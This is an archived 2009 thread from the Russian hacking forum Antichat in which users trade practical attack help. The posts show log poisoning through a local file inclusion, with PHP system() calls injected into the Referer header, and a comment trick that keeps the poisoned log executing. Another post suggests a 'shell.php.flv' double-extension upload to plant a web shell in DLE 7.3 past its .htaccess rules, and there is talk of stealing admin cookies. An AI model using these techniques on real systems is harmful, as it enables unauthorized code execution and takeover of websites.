ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.08.2009, 03:31
|
|
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317
Репутация:
209
|
|
не выполнится он так (((
разве что только xss )
|
|
|
12.08.2009, 03:33
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885
Репутация:
34
|
|
угу сопру куки админа,когда есть доступ к бд форума)))
|
|
|
|
12.08.2009, 03:40
|
|
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317
Репутация:
209
|
|
Ну дык я не говорю что куки тащить надо, просто говорю что пхп код не выполнится таким макаром, только html )
|
|
|
|
12.08.2009, 04:51
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885
Репутация:
34
|
|
нашел файл логов через php incl,в reffer вставил
http://www.site<?php system(ls); ?>site.com/index.php
вылазит ошибка Parse error: syntax error, unexpected T_STRING что не так?
|
|
|
|
12.08.2009, 04:53
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
http://www.site<?php system('ls'); ?>site.com/index.php
вроде так должно быть
|
|
|
|
12.08.2009, 05:04
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885
Репутация:
34
|
|
испортил логи терь над ждать пока ошибка исчезнет)
|
|
|
|
12.08.2009, 13:06
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
заливка шела в дле
Есть доступ к dle админке, версия 7.3.
Включил возможность добавлять файлы, но к новости так прикрепить и не смог.
Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:
PHP код:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
Какие есть способы залить шел? |
|
|
|
12.08.2009, 13:08
|
|
Banned
Регистрация: 08.08.2009
Сообщений: 46
Провел на форуме:
372123
Репутация:
67
|
|
Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги
нашол обменник
и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств
Кто нить вкурсах что это было?
|
|
|
|
12.08.2009, 13:25
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от u36a
Какие есть способы залить шел?
пробуй shell.php.flv
|
|
|
|
12.08.2009, 13:42
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от RazyKK
испортил логи терь над ждать пока ошибка исчезнет)
Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет:
PHP код:
<?php
system('dir');
die();/*
<?php
system(;
?>
Ругается конечно, но работает.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 12.08.2009 в 13:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
